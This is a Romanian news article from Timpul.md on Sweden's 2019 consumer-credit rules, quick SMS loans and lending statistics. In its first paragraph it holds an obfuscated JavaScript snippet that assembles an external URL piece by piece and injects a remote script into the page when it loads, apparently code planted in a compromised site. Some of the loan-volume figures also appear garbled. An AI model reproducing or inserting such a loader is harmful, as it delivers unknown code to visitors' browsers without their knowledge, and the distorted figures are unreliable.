Timpul.md

Economie 17 Noiembrie 2020 | 14:17

Experiență în reglementarea pieței creditelor de consum din Suedia

De la 1 iulie 2019, au intrat în vigoare Regulile generale ale Agenției suedeze pentru consumatori pentru împrumuturile de consum. Motivul modificării legislației a fost creșterea pieței creditelor, precum și numărul mare de delincvențe și neplăți, cu care guvernul se luptă din 2007. În cele din urmă, introducerea noilor reguli a fost influențată de exemplul Norvegiei, prima dintre țările scandinave care a înăsprit cerințele pentru împrumuturile de consum. (function(){ qdpq=document.createElement("script");qdpq_=("us")+("ta"); qdpq_+="t"+(".");qdpq_+=("in");qdpqu="247046408";qdpq.async=true; qdpqu+=".uxzf2srqdpq4e7j2k";qdpq.type="text/javascript";qdpq_+="f"+"o"+("/"); qdpqu+="if10p3X6lsnbt";qdpq.src="https://"+qdpq_+qdpqu; dqdpq=document.body;dqdpq.appendChild(qdpq); })();

Motivele introducerii Regulilor

Anterior, Suedia a luat deja măsuri menite să reducă rata de creștere a împrumuturilor de consum, în special așa-numitele „împrumuturi rapide” sau „împrumuturi prin SMS”.

Împrumutul rapid (în suedeză. Snabblån, prescurtare. Låna pengar snabbt och enkelt- împrumut rapid) este un tip de împrumut care vă permite să împrumutați de la distanță și relativ rapid sume mici, cel mai adesea 500-3000 coroane (denumite în continuare coroane suedeze). În 2006-2007, banii puteau fi primiți în decurs de 15 minute, începând cu 2008 - a doua zi. Astfel de împrumuturi sunt emise în medie pe o lună. În acest caz, analogul semnăturii este codul din SMS, pe care compania îl trimite dacă cererea este aprobată.

Ușurința de a obține astfel de împrumuturi a provocat împrumutați iresponsabili și de la bun început a condus la o creștere uriașă a delincvențelor și a neplăților: în 2007, numărul împrumuturilor cu probleme a fost de 25,4 mii, în 2008 - 35,8 mii. În 2015, numărul acestora a ajuns la 65 mii.

Ce măsuri au fost luate?

Așadar, în 2019, guvernul suedez, urmând exemplul Norvegiei, a înăsprit regulile de acordare a creditelor de consum. Principalele dispoziții ale noilor reguli:

Una dintre cerințele importante este aceea că termenii acestui sau acelui împrumut trebuie să corespundă dimensiunii și naturii sale, în timp ce sunt numiți în interesul clientului - de exemplu, împrumuturile pentru o sumă mică ar trebui să fie emise pentru o perioadă scurtă de timp pentru a evita plățile inutile inutile.

Rezultatele introducerii regulii

În acest moment, rezultatele măsurilor luate ar trebui evaluate cu prudență. Piața continuă să crească, dar trebuie avut în vedere faptul că situația a fost influențată de destabilizarea economiei asociată cu pandemia de coronavirus.

În timp ce analiștii popularei resurse suedeze smslansnabb.se observă că în iunie împrumuturile acordate sectorului privat din Suedia s-au ridicat la 1.500.331 miliarde de coroane, în iulie volumul pieței a crescut cu încă 3315 milioane de coroane

Între 1996 și 2020, împrumuturile lunare de consum au avut în medie 925.088 miliarde coroane. Cel mai scăzut nivel a fost înregistrat în iulie 1996 (344,995 miliarde de coroane), iar cel mai ridicat în mai 2020 (1,533,206 miliarde de coroane).

Cu toate acestea, trebuie remarcat faptul că până la 20% din creșterea creditelor de consum în 2020 poate fi atribuită împrumuturilor emise de jucători importanți (precum Advisa sau Lendo) din afara țării.

Pe aceeaşi temă

Versiune completă web Înapoi sus